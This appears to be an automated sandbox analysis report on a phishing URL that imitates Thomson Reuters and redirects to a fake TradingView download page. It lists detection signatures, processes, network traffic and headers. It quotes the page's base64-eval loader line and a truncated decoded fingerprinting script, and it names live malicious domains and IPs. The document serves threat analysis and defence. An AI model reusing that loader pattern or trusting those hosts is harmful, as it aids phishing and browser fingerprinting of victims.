Edit tour

Windows Analysis Report
https://tax.thomson-reuterfiles.com/

Overview

General Information

Sample URL:https://tax.thomson-reuterfiles.com/
Analysis ID:1647531
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains suspicious onload / onerror event
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
HTML body contains low number of good links
HTML page contains hidden javascript code
No HTML title found
Suricata IDS alerts with low severity for network traffic
Suspicious form URL found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w11x64_office
  • chrome.exe (PID: 728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
    • chrome.exe (PID: 3288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1860,i,15283521975665651647,5662858992958527142,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2232 /prefetch:11 MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • chrome.exe (PID: 6520 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/" MD5: DBE43C1D0092437B88CFF7BD9ABC336C)
  • rundll32.exe (PID: 6676 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: C87FA6FC1D294962EABE44509FE1921C)
  • cleanup
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-24T23:26:56.613384+010020566432Possible Social Engineering Attempted192.168.2.2460871194.163.44.11443TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://down.tradingviewdownload.top/dw.php... The script uses the 'Function' constructor to execute dynamically generated code, which is a high-risk indicator of potential malicious behavior. This allows for the execution of arbitrary JavaScript, which could lead to data exfiltration, system compromise, or other harmful actions.
Source: https://tax.thomson-reuterfiles.comJoe Sandbox AI: The URL 'https://tax.thomson-reuterfiles.com' appears to be a typosquatting attempt targeting the well-known brand 'Thomson Reuters'. The legitimate URL is 'https://www.thomsonreuters.com'. The analyzed URL uses a subdomain 'tax' which could be relevant to Thomson Reuters' tax-related services, increasing the likelihood of user confusion. The main domain 'thomson-reuterfiles.com' closely resembles 'thomsonreuters.com', with the addition of 'files' and the substitution of 'reuters' with 'reuterfiles'. This substitution and addition are likely intended to mislead users into thinking they are interacting with a legitimate Thomson Reuters service. The structural similarity and the use of a relevant subdomain suggest a high likelihood of typosquatting.
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: (new function(atob(this.dataset.digest)))();
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: Number of links: 0
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: Base64 decoded: (function(){var e=[],b={};try{function c(a){if("object"===typeof a&&null!==a){var f={};function n(l){try{var k=a[l];switch(typeof k){case "object":if(null===k)break;case "function":k=k.toString()}f[l]=k}catch(t){e.push(t.message)}}for(var d in a)n(d);try{...
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: HTML title missing
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: Form action: https://down.tradingviewdownload.top/dw.php
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: No favicon
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: No <meta name="author".. found
Source: https://down.tradingviewdownload.top/dw.phpHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.24:60850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.24:60852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.24:60853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.238.55.96:443 -> 192.168.2.24:60867 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.24:60869 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.24:60870 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 12MB later: 36MB
Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.24:60871 -> 194.163.44.11:443
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.66
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.72.99
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknownTCP traffic detected without corresponding DNS query: 23.200.0.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.200.0.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.200.0.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.219.161.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.219.161.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.204.23.20
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.146
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/6c5712a607796dcd.css HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-2555a4296ab7a1b2.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-0c7baedefba6b077.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-49b0a41ec78c7394.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-1e66c022522ffc96.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/849-a4a13dffe91c49e7.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-899e26e961b4ef93.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/search-background-desktop.a9bd8cdc.png HTTP/1.1Host: tax.thomson-reuterfiles.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2 HTTP/1.1Host: app-data.gcs.trstatic.netConnection: keep-aliveOrigin: https://tax.thomson-reuterfiles.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dw.php HTTP/1.1Host: down.tradingviewdownload.topConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tax.thomson-reuterfiles.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /files/images/Logo.png HTTP/1.1Host: down.tradingviewdownload.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://down.tradingviewdownload.top/dw.phpAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _cid=c7d4b4821244c43205d08df5069d19d8
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: tax.thomson-reuterfiles.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: app-data.gcs.trstatic.net
Source: global trafficDNS traffic detected: DNS query: down.tradingviewdownload.top
Source: unknownHTTP traffic detected: POST /dw.php HTTP/1.1Host: down.tradingviewdownload.topConnection: keep-aliveContent-Length: 146180Cache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Origin: https://down.tradingviewdownload.topContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://down.tradingviewdownload.top/dw.phpAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _cid=c7d4b4821244c43205d08df5069d19d8
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 22:26:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: unknownNetwork traffic detected: HTTP traffic on port 60850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60817
Source: unknownNetwork traffic detected: HTTP traffic on port 60831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60859
Source: unknownNetwork traffic detected: HTTP traffic on port 60867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60852
Source: unknownNetwork traffic detected: HTTP traffic on port 60872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60860
Source: unknownNetwork traffic detected: HTTP traffic on port 60862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60864
Source: unknownNetwork traffic detected: HTTP traffic on port 60871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60871
Source: unknownNetwork traffic detected: HTTP traffic on port 60861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60870
Source: unknownNetwork traffic detected: HTTP traffic on port 60832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60831
Source: unknownNetwork traffic detected: HTTP traffic on port 60869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60830
Source: unknownNetwork traffic detected: HTTP traffic on port 60853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60881
Source: unknownNetwork traffic detected: HTTP traffic on port 60881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60889
Source: unknownNetwork traffic detected: HTTP traffic on port 60864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60889 -> 443
Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.24:60850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.24:60852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.241.61.45:443 -> 192.168.2.24:60853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.238.55.96:443 -> 192.168.2.24:60867 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.24:60869 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.44.11:443 -> 192.168.2.24:60870 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir728_1748885946
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir728_1748885946
Source: classification engineClassification label: mal52.phis.win@30/19@23/150
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\a65f7ead-e20b-4cfe-81c9-5f7957509ceb.tmp
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1860,i,15283521975665651647,5662858992958527142,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2232 /prefetch:11
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tax.thomson-reuterfiles.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1860,i,15283521975665651647,5662858992958527142,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2232 /prefetch:11
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
